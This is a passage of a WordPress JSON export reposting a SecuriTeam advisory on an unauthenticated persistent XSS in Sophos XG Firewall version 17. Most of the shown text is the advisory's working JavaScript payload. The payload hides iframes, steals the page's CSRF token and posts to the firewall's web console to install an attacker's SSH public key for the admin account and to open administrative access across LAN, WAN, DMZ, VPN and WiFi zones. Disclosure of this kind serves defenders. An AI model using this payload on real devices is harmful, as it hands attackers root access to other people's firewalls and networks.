class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-7\"><span class=\"crayon-v\">iframe2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">style<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;width:0; height:0; border:0; border:none; vivibility:0&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-8\"><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">appendChild<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">iframe2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-9\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">window<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">location<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-10\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;\/&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-11\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">IPV<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;\/\/&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-12\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">split<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;=&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-13\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">csrf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arr2<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-14\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ajax<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;{&#8220;username&#8221;:&#8221;admin&#8221;,&#8221;allowpubkeyauth&#8221;:&#8221;1&#8243;,&#8221;sshkey&#8221;:[&#8220;===&gt;INSERT-YOUR-PUB-KEY&lt;===&#8221;]}&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-15\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">param<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;csrf=&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">csrf<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;&amp;mode=2501&amp;Event=UPDATE&amp;Entity=PublicKeyAuth&amp;json=&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">ajax<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;&amp;__RequestType=ajax&amp;t=1507131213973&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-16\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">XMLHttpRequest<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-17\"><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;POST&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">IPV<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;\/webconsole\/Controller&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-18\"><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setRequestHeader<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Content-type&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;application\/x-www-form-urlencoded&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-19\"><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">onreadystatechange<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-20\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">readyState<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getElementById<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;peruid&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">contentWindow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">responseText<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-26\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-27\"><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">send<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">param<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-28\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ajax2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;{&#8220;localaclid&#8221;:[&#8220;LAN#2&#8243;,&#8221;LAN#4&#8243;,&#8221;LAN#6&#8243;,&#8221;LAN#13&#8243;,&#8221;LAN#5&#8243;,&#8221;LAN#9&#8243;,&#8221;LAN#8&#8243;,&#8221;LAN#14&#8243;,&#8221;LAN#10&#8243;,&#8221;LAN#7&#8243;,&#8221;LAN#38&#8243;,&#8221;LAN#23&#8243;,&#8221;LAN#18&#8243;,&#8221;WAN#4&#8243;,&#8221;WAN#10&#8243;,&#8221;WAN#38&#8243;,&#8221;DMZ#10&#8243;,&#8221;DMZ#38&#8243;,&#8221;DMZ#18&#8243;,&#8221;VPN#18&#8243;,&#8221;WiFi#2&#8243;,&#8221;WiFi#4&#8243;,&#8221;WiFi#6&#8243;,&#8221;WiFi#13&#8243;,&#8221;WiFi#5&#8243;,&#8221;WiFi#9&#8243;,&#8221;WiFi#8&#8243;,&#8221;WiFi#14&#8243;,&#8221;WiFi#10&#8243;,&#8221;WiFi#7&#8243;,&#8221;WiFi#38&#8243;,&#8221;WiFi#23&#8243;,&#8221;WiFi#18&#8221;]}&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-29\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">param2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;csrf=&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">csrf<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;&amp;mode=72&amp;json=&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">ajax2<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;&amp;__RequestType=ajax&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-30\"><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">XMLHttpRequest<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-31\"><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;POST&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">IPV<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8216;\/webconsole\/Controller&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-32\"><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">setRequestHeader<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Content-type&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;application\/x-www-form-urlencoded&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-33\"><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">onreadystatechange<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-34\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">readyState<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">xhttp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getElementById<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;peruid2&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">contentWindow<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">open<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">responseText<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">doc<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-39\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a53ee9cb7009772174720-40\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a53ee9cb7009772174720-41\"><span class=\"crayon-v\">xhttp2<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">send<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">param2<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0075 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3612\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/Sophos-XG-Unauthenticated-Persistent-XSS-2-300x169.jpg\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 08 Jan 2018 06:21:27 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes an unauthenticated persistent XSS that leads to unauthorized root access found in Sophos XG version 17. Sophos XG Firewall &#8220;provides unprecedented visibility into your network, users, and applications directly from the all-new control center. You also get rich on-box reporting and the option to add Sophos iView for centralized &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3612\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Sophos XG from Unauthenticated Persistent XSS to Unauthorized Root Access<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[17105,11851,10757,12136],"class_list":["post-11037","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-persistent-xss","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11037","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=11037"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11037\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=11037"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=11037"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=11037"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}